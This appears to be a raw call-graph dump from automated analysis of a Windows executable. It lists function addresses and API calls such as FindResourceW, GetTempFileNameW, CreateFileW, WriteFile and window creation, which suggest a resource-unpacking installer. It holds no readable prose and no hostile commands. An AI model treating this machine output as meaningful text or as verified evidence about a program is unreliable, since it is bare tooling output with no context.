7917->7918 7919 401b77 7918->7919 7919->7328 7919->7875 7920->7885 7921->7889 7923 40dea0 2 API calls 7922->7923 7924 405f1b 7923->7924 7924->7363 7925->7378 7927 403406 7926->7927 7927->7927 7928 40dc00 21 API calls 7927->7928 7929 403418 7928->7929 7930 4051a0 3 API calls 7929->7930 7931 403421 7930->7931 8609 405060 7931->8609 7934 405060 2 API calls 7935 40343a 7934->7935 8612 402ed5 7935->8612 7938 403443 8619 405594 GetVersionExW 7938->8619 7939 403456 7941 403460 7939->7941 7942 4035c6 7939->7942 8625 40dac0 GetLastError TlsGetValue SetLastError 7941->8625 8657 40dac0 GetLastError TlsGetValue SetLastError 7942->8657 7946 403466 8626 40dac0 GetLastError TlsGetValue SetLastError 7946->8626 7947 4035cc 8658 40dac0 GetLastError TlsGetValue SetLastError 7947->8658 7950 40346e 8627 406260 7950->8627 7951 4035d4 7952 406260 2 API calls 7951->7952 7954 4035e0 7952->7954 7956 40db00 3 API calls 7954->7956 7958 4035ea GetSystemDirectoryW PathAddBackslashW 7956->7958 7957 40db00 3 API calls 7959 403484 GetWindowsDirectoryW PathAddBackslashW 7957->7959 7960 4035c4 7958->7960 8630 40dac0 GetLastError TlsGetValue SetLastError 7959->8630 8617 40dac0 GetLastError TlsGetValue SetLastError 7960->8617 7963 4034a5 7965 40dc60 3 API calls 7963->7965 7964 40360b 7966 40dc60 3 API calls 7964->7966 7967 4034ad 7965->7967 7968 403613 7966->7968 7969 40dc60 3 API calls 7967->7969 8618 405170 TlsGetValue 7968->8618 7971 4034b8 7969->7971 7973 40db00 3 API calls 7971->7973 7972 40361a 7976 40db90 HeapFree 7972->7976 7974 4034c2 PathAddBackslashW 7973->7974 8631 40dac0 GetLastError TlsGetValue SetLastError 7974->8631 7978 403632 7976->7978 7977 4034d5 7979 40dc60 3 API calls 7977->7979 7980 40db90 HeapFree 7978->7980 7981 4034dd 7979->7981 7982 40363a 7980->7982 7984 40dc60 3 API calls 7981->7984 7983 40db90 HeapFree 7982->7983 7985 403643 7983->7985 7986 4034e7 7984->7986 7987 40db90 HeapFree 7985->7987 7988 40db00 3 API calls 7986->7988 7989 40364c 7987->7989 7990 4034f1 7988->7990 7991 40db90 HeapFree 7989->7991 8632 40dac0 GetLastError TlsGetValue SetLastError 7990->8632 7993 403655 7991->7993 7993->7386 7994 4034fb 7995 40dc60 3 API calls 7994->7995 7996 403503 7995->7996 7997 40dc60 3 API calls 7996->7997 7998 40350d 7997->7998 7999 40dc60 3 API calls 7998->7999 8000 403517 7999->8000 8001 40db00 3 API calls 8000->8001 8002 403521 8001->8002 8633 40aa00 8002->8633 8004 40352f 8005 403545 8004->8005 8643 40a610 8004->8643 8007 40aa00 11 API calls 8005->8007 8008 40355d 8007->8008 8009 403573 8008->8009 8010 40a610 11 API calls 8008->8010 8009->7960 8655 40dac0 GetLastError TlsGetValue SetLastError 8009->8655 8010->8009 8012 40358f 8656 40dac0 GetLastError TlsGetValue SetLastError 8012->8656 8014 403597 8015 406260 2 API calls 8014->8015 8016 4035a3 8015->8016 8017 40db00 3 API calls 8016->8017 8018 4035ad GetSystemDirectoryW PathAddBackslashW 8017->8018 8018->7960 8019->7395 8020->7400 8021->7403 8022->7405 8023->7409 8024->7415 8025->7417 8026->7419 8027->7421 8028->7425 8030 40dc00 21 API calls 8029->8030 8031 4031be 8030->8031 8032 405060 2 API calls 8031->8032 8033 4031ca FindResourceW 8032->8033 8034 4031e9 8033->8034 8035 403205 8033->8035 8707 402762 8034->8707 8700 4097e0 8035->8700 8038 403214 8703 40e3c0 8038->8703 8042 403238 8043 40db90 HeapFree 8042->8043 8044 40324f 8043->8044 8045 40dac0 GetLastError TlsGetValue SetLastError 8044->8045 8045->7433 8047 40dc00 21 API calls 8046->8047 8048 40225a 8047->8048 8049 4051a0 3 API calls 8048->8049 8050 402263 8049->8050 8051 402464 8050->8051 8052 40227c 8050->8052 8737 40dac0 GetLastError TlsGetValue SetLastError 8051->8737 8739 40dac0 GetLastError TlsGetValue SetLastError 8052->8739 8055 402282 8740 40dac0 GetLastError TlsGetValue SetLastError 8055->8740 8056 40246e 8058 40dc60 3 API calls 8056->8058 8060 402476 8058->8060 8059 40228a 8741 40dac0 GetLastError TlsGetValue SetLastError 8059->8741 8738 405170 TlsGetValue 8060->8738 8063 40247d 8066 40db90 HeapFree 8063->8066 8064 402292 8742 40dac0 GetLastError TlsGetValue SetLastError 8064->8742 8068 402495 8066->8068 8067 40229a 8743 409850 8067->8743 8070 40db90 HeapFree 8068->8070 8073 40249e 8070->8073 8071 4022ae 8752 405182 TlsGetValue 8071->8752 8075 40db90 HeapFree 8073->8075 8074 4022b3 8753 406000 8074->8753 8077 4024a6 8075->8077 8079 40db90 HeapFree 8077->8079 8081 4024af 8079->8081 8080 40db00 3 API calls 8082 4022c5 8080->8082 8081->7436 8756 40dac0 GetLastError TlsGetValue SetLastError 8082->8756 8084 4022cb 8757 40dac0 GetLastError TlsGetValue SetLastError 8084->8757 8086 4022d3 8758 40dac0 GetLastError TlsGetValue SetLastError 8086->8758 8088 4022db 8759 40dac0 GetLastError TlsGetValue SetLastError 8088->8759 8090 4022e3 8091 409850 4 API calls 8090->8091 8092 4022fa 8091->8092 8760 405182 TlsGetValue 8092->8760 8094 4022ff 8095 406000 4 API calls 8094->8095 8096 402307 8095->8096 8097 40db00 3 API calls 8096->8097 8098 402311 8097->8098 8761 40dac0 GetLastError TlsGetValue SetLastError 8098->8761 8100 402317 8762 40dac0 GetLastError TlsGetValue SetLastError 8100->8762 8102 40231f 8763 40dac0 GetLastError TlsGetValue SetLastError 8102->8763 8104 402332 8764 40dac0 GetLastError TlsGetValue SetLastError 8104->8764 8106 40233a 8765 4057f0 8106->8765 8108 402350 8781 40dcc0 TlsGetValue 8108->8781 8110 402355 8782 40dac0 GetLastError TlsGetValue SetLastError 8110->8782 8112 40235b 8783 40dac0 GetLastError TlsGetValue SetLastError 8112->8783 8114 402363 8115 4057f0 8 API calls 8114->8115 8116 402379 8115->8116 8784 405182 TlsGetValue 8116->8784 8118 40237e 8785 405182 TlsGetValue 8118->8785 8120 402386 8786 408ba9 8120->8786 8123 40db00 3 API calls 8124 402399 8123->8124 8125 40245a 8124->8125 8126 4023aa 8124->8126 8128 401cf6 36 API calls 8125->8128 8828 40dac0 GetLastError TlsGetValue SetLastError 8126->8828 8128->8051 8129 4023b0 8829 40dac0 GetLastError TlsGetValue SetLastError 8129->8829 8131 4023b8 8830 40dac0 GetLastError TlsGetValue SetLastError 8131->8830 8133 4023c5 8831 40dac0 GetLastError TlsGetValue SetLastError 8133->8831 8135 4023cd 8136 406000 4 API calls 8135->8136 8137 4023d8 8136->8137 8832 405182 TlsGetValue 8137->8832 8139 4023dd 8140 40cd40 7 API calls 8139->8140 8141 4023e5 8140->8141 8142 40db00 3 API calls 8141->8142 8144 4023ef 8142->8144 8143 402458 8143->8051 8144->8143 8833 40dac0 GetLastError TlsGetValue SetLastError 8144->8833 8146 402405 8834 40dac0 GetLastError TlsGetValue SetLastError 8146->8834 8148 402412 8835 40dac0 GetLastError TlsGetValue SetLastError 8148->8835 8150 40241a 8151 4057f0 8 API calls 8150->8151 8152 402430 8151->8152 8836 40dcc0 TlsGetValue 8152->8836 8154 402435 8837 405182 TlsGetValue 8154->8837 8156 402440 8838 408a67 8156->8838 8159 4051a0 3 API calls 8160 40244e 8159->8160 8161 401cf6 36 API calls 8160->8161 8161->8143 8163 40dc00 21 API calls 8162->8163 8184 401f02 8163->8184 8164 401f83 8166 4097e0 RtlAllocateHeap 8164->8166 8165 40dac0 GetLastError TlsGetValue SetLastError 8165->8184 8167 401f8d 8166->8167 8895 40dac0 GetLastError TlsGetValue SetLastError 8167->8895 8169 401f97 8896 40dac0 GetLastError TlsGetValue SetLastError 8169->8896 8170 405f10 2 API calls 8170->8184 8172 401f9f 8897 40a3d2 8172->8897 8175 40db00 3 API calls 8176 401fb0 GetTempFileNameW 8175->8176 8906 40dac0 GetLastError TlsGetValue SetLastError 8176->8906 8178 401fce 8907 40dac0 GetLastError TlsGetValue SetLastError 8178->8907 8180 40dc60 wcslen TlsGetValue RtlReAllocateHeap 8180->8184 8181 401fd6 8183 409800 3 API calls 8181->8183 8182 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8182->8184 8185 401fe1 8183->8185 8184->8164 8184->8165 8184->8170 8184->8180 8184->8182 8186 40db00 3 API calls 8185->8186 8187 401fed 8186->8187 8908 40a3c4 8187->8908 8193 402023 8917 40dac0 GetLastError TlsGetValue SetLastError 8193->8917 8195 40202b 8196 409800 3 API calls 8195->8196 8197 402036 8196->8197 8198 40db00 3 API calls 8197->8198 8199 402042 8198->8199 8200 40a3c4 2 API calls 8199->8200 8201 40204d 8200->8201 8202 40a305 3 API calls 8201->8202 8203 402058 GetTempFileNameW PathAddBackslashW 8202->8203 8918 40dac0 GetLastError TlsGetValue SetLastError 8203->8918 8205 402083 8919 40dac0 GetLastError TlsGetValue SetLastError 8205->8919 8207 40208b 8208 409800 3 API calls 8207->8208 8209 402096 8208->8209 8210 40db00 3 API calls 8209->8210 8211 4020a2 8210->8211 8212 40a3c4 2 API calls 8211->8212 8213 4020ad PathRenameExtensionW 8212->8213 8920 4097c0 HeapFree 8213->8920 8215 4020c5 8216 40db90 HeapFree 8215->8216 8217 4020d2 8216->8217 8218 40db90 HeapFree 8217->8218 8219 4020db 8218->8219 8220 40db90 HeapFree 8219->8220 8221 4020e4 8220->8221 8222 404163 8221->8222 8223 40dc00 21 API calls 8222->8223 8227 404170 8223->8227 8224 4041f1 8927 40dac0 GetLastError TlsGetValue SetLastError 8224->8927 8225 40dac0 GetLastError TlsGetValue SetLastError 8225->8227 8227->8224 8227->8225 8229 405f10 2 API calls 8227->8229 8238 40dc60 wcslen TlsGetValue RtlReAllocateHeap 8227->8238 8241 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8227->8241 8228 4041f7 8230 403718 94 API calls 8228->8230 8229->8227 8231 40420d 8230->8231 8232 40db00 3 API calls 8231->8232 8233 404217 8232->8233 8928 40a59a 8233->8928 8236 40db90 HeapFree 8237 40422b 8236->8237 8239 40db90 HeapFree 8237->8239 8238->8227 8240 404234 8239->8240 8242 40db90 HeapFree 8240->8242 8241->8227 8243 403f99 8242->8243 8244 40dac0 GetLastError TlsGetValue SetLastError 8243->8244 8244->7443 8246 40dc00 21 API calls 8245->8246 8247 403722 8246->8247 8248 4051a0 3 API calls 8247->8248 8249 40372b 8248->8249 8250 405060 2 API calls 8249->8250 8251 403737 8250->8251 8252 403742 8251->8252 8253 403766 8251->8253 8933 40dac0 GetLastError TlsGetValue SetLastError 8252->8933 8254 403770 8253->8254 8255 403793 8253->8255 8935 40dac0 GetLastError TlsGetValue SetLastError 8254->8935 8258 4037c6 8255->8258 8259 40379d 8255->8259 8262 4037d0 8258->8262 8263 4037f9 8258->8263 8936 40dac0 GetLastError TlsGetValue SetLastError 8259->8936 8260 403748 8934 40dac0 GetLastError TlsGetValue SetLastError 8260->8934 8261 40377c 8266 40dc60 3 API calls 8261->8266 8954 40dac0 GetLastError TlsGetValue SetLastError 8262->8954 8270 403803 8263->8270 8271 40382c 8263->8271 8272 403784 8266->8272 8268 4037a3 8937 40dac0 GetLastError TlsGetValue SetLastError 8268->8937 8269 403750 8277 40a435 4 API calls 8269->8277 8956 40dac0 GetLastError TlsGetValue SetLastError 8270->8956 8274 403836 8271->8274 8275 40385f 8271->8275 8281 40db00 3 API calls 8272->8281 8273 4037d6 8955 40dac0 GetLastError TlsGetValue SetLastError 8273->8955 8958 40dac0 GetLastError TlsGetValue SetLastError 8274->8958 8279 403892 8275->8279 8280 403869 8275->8280 8285 403757 8277->8285 8291 4038c5 8279->8291 8292 40389c 8279->8292 8960 40dac0 GetLastError TlsGetValue SetLastError 8280->8960 8288 403761 8281->8288 8284 4037ab 8938 40a47a 8284->8938 8294 40db00 3 API calls 8285->8294 8286 403809 8957 40dac0 GetLastError TlsGetValue SetLastError 8286->8957 8931 40dac0 GetLastError TlsGetValue SetLastError 8288->8931 8289 4037de 8300 40a47a 14 API calls 8289->8300 8290 40383c 8959 40dac0 GetLastError TlsGetValue SetLastError 8290->8959 8298 4038f8 8291->8298 8299 4038cf 8291->8299 8962 40dac0 GetLastError TlsGetValue SetLastError 8292->8962 8294->8288 8296 403811 8304 40a47a 14 API calls 8296->8304 8297 40386f 8961 40dac0 GetLastError TlsGetValue SetLastError 8297->8961 8311 403902 8298->8311 8312 403928 8298->8312 8964 40dac0 GetLastError TlsGetValue SetLastError 8299->8964 8308 4037ea 8300->8308 8314 40381d 8304->8314 8320 40db00 3 API calls 8308->8320 8309 403844 8321 40a47a 14 API calls 8309->8321 8310 4038a2 8963 40dac0 GetLastError TlsGetValue SetLastError 8310->8963 8966 40dac0 GetLastError TlsGetValue SetLastError 8311->8966 8318 403980 8312->8318 8319 403932 8312->8319 8313 40db00 3 API calls 8372 4037c1 8313->8372 8325 40db00 3 API calls 8314->8325 8315 4039aa 8326 40dc60 3 API calls 8315->8326 8316 403877 8327 40a47a 14 API calls 8316->8327 8317 4038d5 8965 40dac0 GetLastError TlsGetValue SetLastError 8317->8965 8996 40dac0 GetLastError TlsGetValue SetLastError 8318->8996 8968 40dac0 GetLastError TlsGetValue SetLastError 8319->8968 8320->8372 8331 403850 8321->8331 8324 403908 8967 40dac0 GetLastError TlsGetValue SetLastError 8324->8967 8325->8372 8334 4039b2 8326->8334 8335 403883 8327->8335 8339 40db00 3 API calls 8331->8339 8332 4038aa 8340 40a47a 14 API calls 8332->8340 8932 405170 TlsGetValue 8334->8932 8344 40db00 3 API calls 8335->8344 8336 4038dd 8345 40a47a 14 API calls 8336->8345 8337 403938 8969 40dac0 GetLastError TlsGetValue SetLastError 8337->8969 8338 403986 8997 40dac0 GetLastError TlsGetValue SetLastError 8338->8997 8339->8372 8341 4038b6 8340->8341 8348 40db00 3 API calls 8341->8348 8342 403910 8349 40a47a 14 API calls 8342->8349 8344->8372 8350 4038e9 8345->8350 8348->8372 8353 40391c 8349->8353 8355 40db00 3 API calls 8350->8355 8351 403940 8970 408f95 8351->8970 8352 40398e 8357 40a435 4 API calls 8352->8357 8358 40db00 3 API calls 8353->8358 8354 4039b9 8359 40db90 HeapFree 8354->8359 8355->8372 8361 403995 8357->8361 8358->8372 8363 4039d1 8359->8363 8362 40db00 3 API calls 8361->8362 8362->8288 8366 40db90 HeapFree 8363->8366 8364 40db00 3 API calls 8365 40395b 8364->8365 8368 403974 8365->8368 8369 403968 8365->8369 8367 4039d9 8366->8367 8367->7446 8371 401cf6 36 API calls 8368->8371 8993 40552c 8369->8993 8371->8372 8372->8288 8374 403fe8 8373->8374 8376 409507 SetEnvironmentVariableW 8373->8376 8377 40214f 8374->8377 8376->8374 8378 40dc00 21 API calls 8377->8378 8379 402159 8378->8379 9004 40dac0 GetLastError TlsGetValue SetLastError 8379->9004 8381 40215f 9005 40dac0 GetLastError TlsGetValue SetLastError 8381->9005 8383 402167 9006 40dac0 GetLastError TlsGetValue SetLastError 8383->9006 8385 40216f 9007 40dac0 GetLastError TlsGetValue SetLastError 8385->9007 8387 402177 8388 40cd40 7 API calls 8387->8388 8389 402189 8388->8389 9008 405182 TlsGetValue 8389->9008 8391 40218e 8392 405e30 5 API calls 8391->8392 8393 402196 8392->8393 8394 40db00 3 API calls 8393->8394 8395 4021a0 8394->8395 9009 40dac0 GetLastError TlsGetValue SetLastError 8395->9009 8397 4021a6 9010 40dac0 GetLastError TlsGetValue SetLastError 8397->9010 8399 4021ae 9011 40dac0 GetLastError TlsGetValue SetLastError 8399->9011 8401 4021b6 9012 40dac0 GetLastError TlsGetValue SetLastError 8401->9012 8403 4021be 8404 40cd40 7 API calls 8403->8404 8405 4021d0 8404->8405 9013 405182 TlsGetValue 8405->9013 8407 4021d5 8408 405e30 5 API calls 8407->8408 8409 4021dd 8408->8409 8410 40db00 3 API calls 8409->8410 8411 4021e7 8410->8411 9014 40dac0 GetLastError TlsGetValue SetLastError 8411->9014 8413 4021ed 9015 403255 8413->9015 8416 40db00 3 API calls 8417 402204 8416->8417 9049 40dac0 GetLastError TlsGetValue SetLastError 8417->9049 8419 40220a 8420 403255 53 API calls 8419->8420 8421 402215 8420->8421 8422 40db00 3 API calls 8421->8422 8423 40221f 8422->8423 9050 4024b6 8423->9050 8426 40db90 HeapFree 8427 402239 8426->8427 8428 40db90 HeapFree 8427->8428 8429 402241 8428->8429 8430 40db90 HeapFree 8429->8430 8431 40224a 8430->8431 8432 40dac0 GetLastError TlsGetValue SetLastError 8431->8432 8432->7454 8434 40dc00 21 API calls 8433->8434 8435 401c2a 8434->8435 8436 4051a0 3 API calls 8435->8436 8437 401c33 8436->8437 8438 401c52 8437->8438 9180 40dac0 GetLastError TlsGetValue SetLastError 8437->9180 9178 40dac0 GetLastError TlsGetValue SetLastError 8438->9178 8441 401c5b 8443 40dc60 3 API calls 8441->8443 8442 401c41 9181 40259b 8442->9181 8446 401c63 8443->8446 9179 405170 TlsGetValue 8446->9179 8447 40db00 3 API calls 8447->8438 8449 401c6a 8450 40db90 HeapFree 8449->8450 8451 401c81 8450->8451 8451->7457 8452->7466 8453->7470 8454->7472 8456 4060e6 8455->8456 8458 4060b8 8455->8458 9265 40df40 TlsGetValue 8456->9265 9256 406020 8458->9256 8459 4060ef 8459->7474 8462->7478 8463->7480 8464->7488 8465->7490 8466->7492 8468 40dea0 2 API calls 8467->8468 8469 40a447 GetCurrentDirectoryW 8468->8469 8470 40a457 8469->8470 9268 40dff0 TlsGetValue 8470->9268 8472 4040b9 8473 40dcc0 TlsGetValue 8472->8473 8473->7496 8474->7498 8475->7504 8476->7506 8477->7508 8479 401d60 8478->8479 8479->8479 8480 40dc00 21 API calls 8479->8480 8481 401d72 8480->8481 8482 405060 2 API calls 8481->8482 8483 401d7e 8482->8483 8484 405060 2 API calls 8483->8484 8485 401d8b 8484->8485 8486 405060 2 API calls 8485->8486 8487 401d98 8486->8487 9269 40dac0 GetLastError TlsGetValue SetLastError 8487->9269 8489 401da4 8490 40dc60 3 API calls 8489->8490 8491 401dac 8490->8491 8492 40db00 3 API calls 8491->8492 8493 401db6 PathQuoteSpacesW 8492->8493 9270 40dac0 GetLastError TlsGetValue SetLastError 8493->9270 8495 401dc9 8496 40dc60 3 API calls 8495->8496 8497 401dd1 8496->8497 8535 4054b1 RtlEnterCriticalSection 8534->8535 8536 404024 8534->8536 8537 4054f7 8535->8537 8540 4054c7 8535->8540 8536->7464 8538 40d7b2 RtlAllocateHeap 8537->8538 8542 405511 RtlLeaveCriticalSection 8538->8542 8539 4054c8 WaitForSingleObject 8539->8540 8541 4054d8 CloseHandle 8539->8541 8540->8537 8540->8539 8543 40d772 HeapFree 8541->8543 8542->8536 8543->8540 8545 40dc00 21 API calls 8544->8545 8546 402fcb 8545->8546 8547 405060 2 API calls 8546->8547 8548 402fd7 8547->8548 8549 403004 8548->8549 9333 40dac0 GetLastError TlsGetValue SetLastError 8548->9333 9335 40dac0 GetLastError TlsGetValue SetLastError 8549->9335 8552 402fe6 9334 40dac0 GetLastError TlsGetValue SetLastError 8552->9334 8553 40300a 9336 40dac0 GetLastError TlsGetValue SetLastError 8553->9336 8556 403012 9337 40dac0 GetLastError TlsGetValue SetLastError 8556->9337 8557 402fee 8559 409800 3 API calls 8557->8559 8561 402ffa 8559->8561 8560 40301a 9338 40dac0 GetLastError TlsGetValue SetLastError 8560->9338 8563 40db00 3 API calls 8561->8563 8563->8549 8564 403022 8565 40cd40 7 API calls 8564->8565 8566 403032 8565->8566 9339 405182 TlsGetValue 8566->9339 8568 403037 8569 405e30 5 API calls 8568->8569 8570 40303f 8569->8570 8571 40db00 3 API calls 8570->8571 8572 403049 FindResourceW 8571->8572 8573 40306c 8572->8573 8577 403118 8572->8577 8574 402762 26 API calls 8573->8574 8575 40307b 8574->8575 8576 404244 RtlSizeHeap 8575->8576 8579 403088 8576->8579 8578 403140 8577->8578 8580 403130 8577->8580 8581 403147 8577->8581 8584 40db90 HeapFree 8578->8584 8583 4011de 11 API calls 8579->8583 8585 40548c 7 API calls 8580->8585 9349 4027c5 8581->9349 8586 4030a2 8583->8586 8587 40315b 8584->8587 8585->8578 9340 40dac0 GetLastError TlsGetValue SetLastError 8586->9340 8589 40db90 HeapFree 8587->8589 8591 403164 8589->8591 8590 4030a8 9341 40dac0 GetLastError TlsGetValue SetLastError 8590->9341 8591->7464 8593 4030b0 8594 409850 4 API calls 8593->8594 8595 4030c1 8594->8595 8596 40db00 3 API calls 8595->8596 8597 4030cd 8596->8597 9342 4097c0 HeapFree 8597->9342 8599 4030d6 9343 405920 8599->9343 8603 4030f1 9348 40dac0 GetLastError TlsGetValue SetLastError 8603->9348 8605 4030f9 8606 405ea0 4 API calls 8605->8606 8607 40310c 8606->8607 8608 40db00 3 API calls 8607->8608 8608->8577 8659 40dd20 8609->8659 8611 40342d 8611->7934 8613 402edb 8612->8613 8613->8613 8614 40dc00 21 API calls 8613->8614 8615 402eed GetNativeSystemInfo 8614->8615 8616 402f00 8615->8616 8616->7938 8616->7939 8617->7964 8618->7972 8620 4055c2 8619->8620 8624 403448 8619->8624 8620->8624 8662 40554d memset GetModuleHandleW 8620->8662 8623 405600 GetVersionExW 8623->8624 8624->7939 8625->7946 8626->7950 8628 40dea0 2 API calls 8627->8628 8629 40347a 8628->8629 8629->7957 8630->7963 8631->7977 8632->7994 8665 40d0d8 RtlEnterCriticalSection 8633->8665 8635 40aa15 8636 40aaae 8635->8636 8637 40aa1f CreateFileW 8635->8637 8636->8004 8638 40aa40 8637->8638 8639 40aa60 8637->8639 8638->8639 8641 40aa4d RtlAllocateHeap 8638->8641 8642 40aaa5 8639->8642 8674 40d04a RtlEnterCriticalSection 8639->8674 8641->8639 8642->8004 8644 40a629 8643->8644 8645 40a61a 8643->8645 8685 40d099 RtlEnterCriticalSection 8644->8685 8689 40d635 8645->8689 8650 40a66d 8650->8005 8651 40a659 FindCloseChangeNotification 8653 40d04a 4 API calls 8651->8653 8652 40a680 WriteFile 8654 40a648 HeapFree 8652->8654 8653->8650 8654->8651 8655->8012 8656->8014 8657->7947 8658->7951 8660 40dd67 8659->8660 8661 40dd2a wcslen RtlAllocateHeap 8659->8661 8660->8611 8661->8660 8663 405575 GetProcAddress 8662->8663 8664 405585 8662->8664 8663->8664 8664->8623 8664->8624 8666 40d0f2 8665->8666 8667 40d107 8665->8667 8668 40d7b2 RtlAllocateHeap 8666->8668 8669 40d12c 8667->8669 8670 40d10c RtlReAllocateHeap 8667->8670 8672 40d101 RtlLeaveCriticalSection 8668->8672 8671 40d141 RtlAllocateHeap 8669->8671 8669->8672 8670->8669 8671->8672 8672->8635 8675 40d081 8674->8675 8676 40d062 8674->8676 8682 40d772 8675->8682 8676->8675 8677 40d067 8676->8677 8679 40d070 memset 8677->8679 8680 40d08d RtlLeaveCriticalSection 8677->8680 8679->8680 8680->8642 8681 40d08b 8681->8680 8683 40d783 HeapFree 8682->8683 8683->8681 8686 40d0b2 8685->8686 8687 40d0bd RtlLeaveCriticalSection 8685->8687 8686->8687 8688 40a636 8687->8688 8688->8650 8688->8651 8688->8652 8690 40d642 8689->8690 8691 40a625 8689->8691 8695 40d75b RtlEnterCriticalSection 8690->8695 8691->8005 8694 40d648 8694->8691 8696 40d704 8694->8696 8695->8694 8698 40d710 8696->8698 8697 40d754 8697->8694 8698->8697 8699 40d74a RtlLeaveCriticalSection 8698->8699 8699->8697 8701 4097e8 RtlAllocateHeap 8700->8701 8702 4097fa 8700->8702 8701->8038 8702->8038 8704 40e407 8703->8704 8706 40e41b 8704->8706 8718 40e4a0 8704->8718 8706->8042 8708 40dc00 21 API calls 8707->8708 8709 40276b LoadResource SizeofResource 8708->8709 8710 4097e0 RtlAllocateHeap 8709->8710 8711 402798 8710->8711 8733 4098c0 memcpy 8711->8733 8713 4027af FreeResource 8714 4027bf 8713->8714 8715 404244 8714->8715 8734 4097a0 8715->8734 8717 40424d 8717->8035 8719 40ee55 8718->8719 8720 40e4b0 8718->8720 8719->8706 8720->8719 8721 40ea01 8720->8721 8724 40e928 memcpy 8720->8724 8723 40ea69 8721->8723 8725 40fe80 8721->8725 8723->8706 8724->8720 8726 40fe94 8725->8726 8727 40ff02 memcpy 8726->8727 8728 40fedc memcpy 8726->8728 8729 40feaf 8726->8729 8731 40ff48 8727->8731 8732 40ff29 memcpy 8727->8732 8728->8723 8729->8723 8731->8723 8732->8723 8733->8713 8735 4097a8 RtlSizeHeap 8734->8735 8736 4097ba 8734->8736 8735->8717 8736->8717 8737->8056 8738->8063 8739->8055 8740->8059 8741->8064 8742->8067 8744 409869 8743->8744 8745 409859 8743->8745 8747 40dea0 2 API calls 8744->8747 8845 409800 8745->8845 8749 40987f 8747->8749 8851 40dff0 TlsGetValue 8749->8851 8751 4098a8 8751->8071 8752->8074 8852 405f30 8753->8852 8755 4022bb 8755->8080 8756->8084 8757->8086 8758->8088 8759->8090 8760->8094 8761->8100 8762->8102 8763->8104 8764->8106 8766 40590f 8765->8766 8773 405801 8765->8773 8862 40df40 TlsGetValue 8766->8862 8768 405918 8768->8108 8769 405886 8771 40de20 TlsGetValue 8769->8771 8770 405850 _wcsncoll 8770->8773 8772 4058c7 8771->8772 8774 4058e9 8772->8774 8861 40de70 TlsGetValue 8772->8861 8773->8769 8773->8770 8776 40dea0 2 API calls 8774->8776 8778 4058f0 8776->8778 8777 4058d7 memmove 8777->8774 8779 405901 8778->8779 8780 4058f6 wcsncpy 8778->8780 8779->8108 8780->8779 8781->8110 8782->8112 8783->8114 8784->8118 8785->8120 8863 408a98 8786->8863 8788 408bc1 8789 408a98 3 API calls 8788->8789 8790 408bd0 8789->8790 8791 408a98 3 API calls 8790->8791 8792 408be3 8791->8792 8793 408bf0 GetStockObject 8792->8793 8794 408bfd LoadIconW LoadCursorW RegisterClassExW 8792->8794 8793->8794 8867 409111 GetForegroundWindow 8794->8867 8799 408c87 IsWindowEnabled 8800 408cab 8799->8800 8801 408c92 EnableWindow 8799->8801 8802 409111 3 API calls 8800->8802 8801->8800 8803 408cbe GetSystemMetrics GetSystemMetrics CreateWindowExW 8802->8803 8804 408d0b SetWindowLongW CreateWindowExW SendMessageW 8803->8804 8805 408efa 8803->8805 8807 408d65 8804->8807 8808 408d68 CreateWindowExW SendMessageW SetFocus 8804->8808 8806 408f0d 8805->8806 8881 40df40 TlsGetValue 8805->8881 8882 408ada 8806->8882 8807->8808 8811 408de5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8808->8811 8812 408dbb SendMessageW wcslen wcslen SendMessageW 8808->8812 8814 408eaa 8811->8814 8812->8811 8816 408eb3 8814->8816 8817 408e6e GetMessageW 8814->8817 8815 408ada HeapFree 8818 408f1f 8815->8818 8820 408eb7 DestroyAcceleratorTable 8816->8820 8821 408ebe 8816->8821 8817->8816 8819 408e83 TranslateAcceleratorW 8817->8819 8822 408ada HeapFree 8818->8822 8819->8814 8823 408e94 TranslateMessage DispatchMessageW 8819->8823 8820->8821 8821->8805 8824 408ec5 wcslen 8821->8824 8826 40238f 8822->8826 8823->8814 8825 40dea0 2 API calls 8824->8825 8827 408edc wcscpy HeapFree 8825->8827 8826->8123 8827->8805 8828->8129 8829->8131 8830->8133 8831->8135 8832->8139 8833->8146 8834->8148 8835->8150 8836->8154 8837->8156 8839 409111 3 API calls 8838->8839 8840 408a6d 8839->8840 8841 4091c8 16 API calls 8840->8841 8842 408a76 MessageBoxW 8841->8842 8843 4091c8 16 API calls 8842->8843 8844 402449 8843->8844 8844->8159 8846 40980d 8845->8846 8847 40dea0 2 API calls 8846->8847 8848 40982b 8847->8848 8849 409831 memcpy 8848->8849 8850 40983f 8848->8850 8849->8850 8850->8071 8851->8751 8855 405f41 8852->8855 8853 40de20 TlsGetValue 8854 405fb4 8853->8854 8856 40dea0 2 API calls 8854->8856 8855->8853 8855->8855 8857 405fc2 8856->8857 8859 405fd2 8857->8859 8860 40df70 TlsGetValue 8857->8860 8859->8755 8860->8859 8861->8777 8862->8768 8864 408aa0 wcslen RtlAllocateHeap 8863->8864 8865 408ad6 8863->8865 8864->8865 8866 408ac6 wcscpy 8864->8866 8865->8788 8866->8788 8868 408c72 8867->8868 8869 409122 GetWindowThreadProcessId GetCurrentProcessId 8867->8869 8870 4091c8 8868->8870 8869->8868 8871 4091d2 EnumWindows 8870->8871 8876 40921d 8870->8876 8874 4091ef 8871->8874 8877 408c7e 8871->8877 8885 409147 GetWindowThreadProcessId GetCurrentThreadId 8871->8885 8872 40922a GetCurrentThreadId 8872->8876 8873 4091f1 GetCurrentThreadId 8873->8874 8874->8873 8874->8877 8878 409204 SetWindowPos 8874->8878 8875 409240 EnableWindow 8875->8876 8876->8872 8876->8875 8876->8877 8879 409251 SetWindowPos 8876->8879 8880 40d772 HeapFree 8876->8880 8877->8799 8877->8800 8878->8874 8879->8876 8880->8876 8881->8806 8883 408ae1 HeapFree 8882->8883 8884 408af3 8882->8884 8883->8884 8884->8815 8886 409165 IsWindowVisible 8885->8886 8887 4091bf 8885->8887 8886->8887 8888 409170 8886->8888 8889 40d7b2 RtlAllocateHeap 8888->8889 8890 40917c GetCurrentThreadId GetWindowLongW 8889->8890 8891 40919a 8890->8891 8892 40919e GetForegroundWindow 8890->8892 8891->8892 8892->8887 8893 4091a8 IsWindowEnabled 8892->8893 8893->8887 8894 4091b3 EnableWindow 8893->8894 8894->8887 8895->8169 8896->8172 8898 40dea0 2 API calls 8897->8898 8899 40a3e5 GetTempPathW LoadLibraryW 8898->8899 8900 40a420 8899->8900 8901 40a402 GetProcAddress 8899->8901 8921 40dff0 TlsGetValue 8900->8921 